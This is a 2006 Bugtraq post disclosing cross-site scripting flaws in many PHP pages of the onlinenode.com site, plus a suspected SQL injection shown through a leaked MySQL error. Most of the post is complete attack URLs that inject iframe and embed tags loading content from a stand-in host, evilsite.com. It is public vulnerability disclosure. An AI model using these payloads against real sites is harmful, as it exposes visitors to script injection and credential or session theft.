[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060611001154.8894.qmail@securityfocus.com>
Date: 11 Jun 2006 00:11:54 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Onlinenode.com - XSS
Onlinenode.com
Homepage:
http://www.onlinenode.com
Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---------------------------
XSS Vuln via node_category.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1">'>"<iframe%20src=http://evilsite.com/scriptlet.html%20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">
--------------------------------------------
XSS Vuln via node_article.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">
-------------------------------------------
Possible SQL injection due to with query error:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=19'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use
near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol.
somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND host != 'dsl-127-0-0.lol.somehost.com'
We can see from the above query, a few table names as well as our IP + hostmask.
XSS Vuln in webpage.php:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=2">'><iframe%20src=http://evilsite.com/scriptlet.html <
Again, same as above the <embed> tags also work for flash.
------------------------------------------
XSS Vulnerability via guestbook.php:
http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id_user=18">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-----------------------------------------
XSS Vulnerability via journal.php:
http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
---------------------------------------
XSS Vuln via pictures.php:
http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_user=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
----------------------------------------
XSS Vuln via mb_thread.php when viewing threads:
http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id_thread=0">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-------------------------------------
XSS Vuln via chatroom.php:
http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_room=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=24&button.y=14
Again, <embed> tags work here too.
Powered by blists - more mailing lists